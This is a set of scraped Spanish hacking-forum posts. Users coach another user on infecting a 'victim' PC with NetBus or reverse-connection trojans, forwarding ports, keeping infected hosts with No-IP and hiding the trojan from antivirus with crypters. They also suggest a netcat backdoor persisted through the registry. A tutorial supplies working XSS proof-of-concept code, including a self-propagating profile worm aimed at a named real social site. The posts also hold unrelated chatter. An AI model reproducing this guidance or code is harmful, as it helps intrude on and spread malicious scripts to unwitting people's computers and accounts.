You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola rollth, hola fudmario,

bien. Gracias por la explcacion. Y por hacerme ver que la prueba que yo hice solo funcionaba porque lo estaba haciendo en el local. No sabia eso.

Como no puedo abrir puertos, fudmario me aconsejo usar un bot. Pero de donde puedo descargar el H-Bot de Houdini? Y que es lo que hace?
Lo unico que encontre en internet fue esto: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Gracias y saludos

Con un troyano de conexión inversa lo harías desde tu router, si escribes ipconfig/all podrás ver la puerta de enlace predeterminada, y la contraseña, si no la has cambiado será admin admin. Abres un puerto y lo dirrecionas a tu PC, puedes ver tu ip privada con ipconfig/all

Una vez que tienes el puerto abierto, si el un pc pide conexión a tu ip pública (cualesmiip.com) por ese puerto que pusiste, el router lo conectará con tu PC. Aún así hay un problema, si configuras tu troyano y pones tu IP, en un tiempo perderás al infectado ¿Por qué? Porque la ip pública cambia con el tiempo, para esto puedes utilizar un No-IP.

Te aconsejo leerte el You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login que viene todo mucho mejor explicado de como te lo he explicado yo.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola fudmario,

Si bien NetBus es muy antiguo a mi me sirvió. Pero creo que no es de conexión directa ya que tiene un servidor y un cliente.  Y cuando lo probé no tuve que abrir los puertos.

Con respecto a los troyanos de conexión inversa...
Hay que abrir puertos? De ser así no me sirviria porque tengo ipv6. Y si bien también se puedo abrir puertos en ipv6 no creo que el troyano lo soporte. Yo navego con ipv6 e ipv6 pero mi servicio de Internet solo admite abrir puertos en ipv6 aparte de no tener NAT.

Finalmente tendría una última duda: si yo en encripto un troyano... de que me sirve si la víctima no lo puede abrir por estar encriptado? O hay una cosa que no entendí?

Gracias y saludos

A ver, si hace falta abrir puertos, tanto en conexión directa como inversa, en conexión directa los puertos se abren en la otra máquina, en conexión inversa se abren en la tuya, no tuviste que abrir puertos porque harías las pruebas en local. En local no hace falta abrirlos.

Por otra parte después de pasarle el crypter al troyano este debería de funcionar igual, solo que indetectado, tu fallo puede ser problema del crypter.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola rollth, hola Stiuvert,

el error es: Excepcion no tratada. Se trato de cargar un dato con el formato incorrecto.
Y mas abajo dice informacion acerca del Jit-debugger.

Pero como dice Stiuvert, es posible que el Crypter rompa el ejecutable haciendolo inservible. Quiza un bug del Crypter.

Lo que encontre ahora es mas poderoso. Este se llama solamente Crypter. Lo probe y absolutamente ningun antivirus detecta al patch.exe. El problema es el siguiente: configuro el NetBus correctamente junto con el patch.exe encriptado pero al abrir el patch.exe encriptado ya no tengo acceso a la computadora victima.
Es mas: lo renombre con el nombre Antianti.exe y ni siquiera aparece en la lista de procesos.

Gracias y saludos

Imagino que el malware funciona antes de encriptarlo, no?

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola Stiuvert,

he probado Crypter FUD y solo lo detectan 15 antivirus el patch.exe. El problema es que al abrir el patch.exe encriptado me larga un error. El error es algo grande por eso si quieres puedes probarlo tu. Me acuerdo que el error decia en una parte: Se trato de cargar un dato con el formato incorrecto.

Gracias y saludos

Si con ese crypter lo detectan 15 antivirus, entonces ya no es FUD, sería FUD en un pasado, pero ya no lo es, tendrás que seguir buscando un nuevo crypter. En cuanto al error, si pusieras el código de error que salía sería genial.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola rollth,

eso solo funciona si mi computadora victima tiene instalado ncat. Lo que yo buscaba era solo valerme de una .exe o un .batch sin instalar nada y que en mi computadora atacante pueda mandar datos a esa .exe y que esa .exe me de todos los directorios y archivos de la computadora victima y que me permita borrar archivo y agregar archivos y ver los procesos.

Gracias y saludos

Creo que volvemos a lo mismo de siempre, y la verdad ya me cansa, se te ha explicado como funciona el malware, que tienes que mandarle un ejecutable para infectarlo, y si no he entendido mal, sigues empeñado en un .exe mágico que te haga hackear a cualquier persona, a pesar de que se te ha dicho que no es posible. En caso de que sea eso a lo que te refieres, creo que no te mereces nada de la la ayuda que estás reciviendo.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Buenas, este año me toca ya elegir que voy a ser para mi futuro y ando un poco perdido, lo que mas me llama es el mundo de la informática y me gustaría estudiar ingeniería de telecomunicaciones. Al ver las competencias que esta dice que obtendrás encontré que dice: "Capacidad para aprender de manera autónoma nuevos conocimientos y técnicas adecuados para la concepción, el desarrollo o la explotación de sistemas y servicios de telecomunicación" y me ha surgido la duda al ver la palabra "explotación" sobre si estudiando este grado puedo aprender sobre hacking, a un nivel algo más avanzado que lo que me ofrece internet.
Muchas gracias

Copernico

La respuesta es que no, definitivamente no vas a aprender hacking, ni vas a aprender nada que no vayas a poder aprender por internet. la cuestión es que en la carrera te preparan de una manera en la que si después estudias temas relacionados con esto te resultará infinitamente más facil. Puestos a elegir, si te gusta la informática yo entraría en ingeniería informática.

nc es netcat o su versión mas nueva ncat es una herramienta que te permite tanto abrir puertos como conectarte a ellos. Es muy sencillo de usar, y puedes abrir un puerto en el que dejes enviar comandos, si esto con un pequeño script lo añades al registro hará justo lo que tu pides.

Si lo único que quieres es hacer unas pruebecitas en tu pc con nc y un script en batch o vb te valdría.

Saludos.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Si hay xss podes leer el token anti csrf y mandar el form igual

Depende del caso, pero se haría muy tedioso explicarlo también, por eso quise dejarlo ahí.

Muy buenas Underc0ders, en el día de hoy me gustaría explicar Y hacer unas POC's, de algunas formas "nuevas" de poder explotar una XSS. Si no entendéis de lo que estoy hablando podríais empezar leyéndoos este You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Lo primero que quiero explicar es como se podría explotar una self XSS, este tipo de XSS se supone que es aquella que solo puedes ejecutarla tú desde tu máquina (y por lo tanto se considera un ejercicio de pura ingeniería social), funcionaría por el metodo POST y no quedaría en ninguna base de datos para que pudieran verlo el resto de usuarios, como puede ser un Mensaje Privado en una web. Un ejemplo es un buscador, pero que en lugar de funcionar enviando los parámetros por la url, se envían por método POST. Os dejo aquí el código que yo voy a usar para que podáis subirlo a un hosting y podáis hacer también la prueba.

<form action="buscar.php" method="POST">
<input type="text" name="busqueda" />
<input type="hidden" name="enviado" value="true" />
<button type="submit">Enviar</button>
</form>

<?php

$busqueda = $_POST["busqueda"];
$enviado = $_POST["enviado"];

if($enviado == "true"){
    echo "<p>No se encuentra la palabra " . $busqueda . ".</p>";
}

?>	

Lo que nosotros vamos a hacer es copiar el form y subirlo a nuestro servidor de una manera que se envíe solo, y le mandaremos el link, ya como prefiráis para ejecutarle el código malicioso. La página en mi servidor ha quedado así.

<form id="myForm" action="url/buscar.php" method="POST">
<input type="hidden" name="busqueda" value="<script>alert(0)</script>" />
<input type="hidden" name="enviado" value="true" />
<img src=x onerror="myFunction()">
</form>

<script>
function myFunction() {
    document.getElementById("myForm").submit();
}
</script>

Y una vez el usuario pulsa el link de mi página maliciosa se ejecuta el self XSS.



La otra cosa que quería explicar es como podemos propagar un XSS, vamos a suponer que tenemos una red social (yo hice las pruebas You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login) en la cual encontramos una XSS, por ejemplo en el nombre en el perfil que es lo que ha sucedido esta vez. Entonces podríamos hacer que cuando alguien se metiese en nuestro perfil se le cambiase el nombre y se le pusiera el mismo payload y así, a su vez podría él infectar a una tercera persona. Pues en esto consistiría el proceso. ¿Y como lo hacemos?

Pues en realidad es sencillo, en este caso, hay muchas XSS's, y yo me voy a aprovechar de la que consiste en el tipo de raza de el animal. Al igual que antes vamos a hacer un HTML con un form, y ahora este form va a cambiar nuestro perfil.

<form id="myForm" action="http://www.facepets.es/usuario.php?dat=datos&mod=ok&mod=off&in=ok" method="POST">
<input name="raza" type="hidden" value="<script type='text/javascript' src='url/archivo1.js'></script><p onclick='salir()'>ROLO</p>">
<img src=x onerror="myFunction()">
</form>
 
<script>
function myFunction() {
    document.getElementById("myForm").submit();
}
</script>

Si os fijáis esto lo que hace es modificar la raza de cualquiera que entre en este link, y en la raza  pone el script archivo1.js
Cuando alguien entra en el perfil de una persona con ese archivo le llevará al form y esto hará que se modifique el perfil. Así cualquier persona que entre en un perfil de alguien infectado quedará el también infectado. Por último os dejo el archivo1.js para que podáis probarlo.

function salir()
{
window.location="url/Prueba 2/maligno.html";
}

Es posible que en estos dos casos haya una variable llamada csrf que es independiente para cada usuario y sirve para impedir este tipo de ataques y no se puedan hacer peticiones "Ilegítimas".

Espero que os haya gustado y sido de utilidad.

También me pueden seguir en Twitter si les hace ilusión: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos.

Muchas Felicidades ANTRAX. Espero que sea un genial día para ti porque te lo mereces, gran persona estás hecho y muy trabajador, de lo que ya no queda. Que vaya muy bien todo en este día

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Esto podría desncriptar archivos por ramsonware 3.0?

No, eso simplemente es un tipo de cifrado que ha hecho él.

La razón como ha dicho jimeno es por complejidad, cuando tienes un bucle sencillo es fácil de saber identificar por qué el bucle acabó, pero en códigos más complejos, meter un break() puede llegar a romperte la cabeza.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Quizá ese tráfico no está dentro de tu Red, es decir, que viaja en otra Subred a la cual tu no tienes acceso.

Por ejemplo, tu equipo navega en la Subred 192.168.124.X y los informes están en la Subred 192.168.125.X, como verás son "redes distintas" por lo cual un Sniffer no podrá hacer nada si esas Subredes están bien configuradas. Cada Subred tiene su propio router, en este caso podría ser 192.168.124.1 y 192.168.125.1

Saludos

Si este fuera el caso podrías instalar un sniffer temporalmente en el telofono para obtener esos datos, y una vez obtenido, copiados y lo que quieras, lo desinstalas.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Muy buen aporte, eres un genio, podrías pasarme la clave por MP. Saludos

Este crypter tiene casi un año ya, no creo que sea de mucha utilidad.

Ya tenemos para hacer donaciones al foro, si bajas hasta abajo podrás ver el botón para donar en paypal. Pero todas las donaciones son reinvertidas al foro, los miembros del staff no nos llevamos ninguna remuneración.

Saludos

Para un trabajo por lo que tengo entendido lo mejor es especializarte en algo, porque podrás dedicarle más tiempo a eso.

Yo por mi parte, como aún ando estudiando la carrera simplemente leo, aprendo y estudio lo que me viene en gana, no tengo una rutina ni algo con lo que guiarme, simplemente hago lo que tengo ganas en cada momento, y por ahora me va muy bien

Saludos.

Yo aconsejaría que no instalases kali, que probases otro OS, ya que kali es algo muy específico para seguridad y que solo vas a utilizar en esos ambitos, puedes meterlo en un pen y bootearlo cuando quieras utilizarl

Te refieres a una subseccion dentro de dudas?

me parece interesante

No desviarse del tema. Parece que no quiere poner captura, osea que quien conozca el error por su explicación que ayude y quien no que lo deje.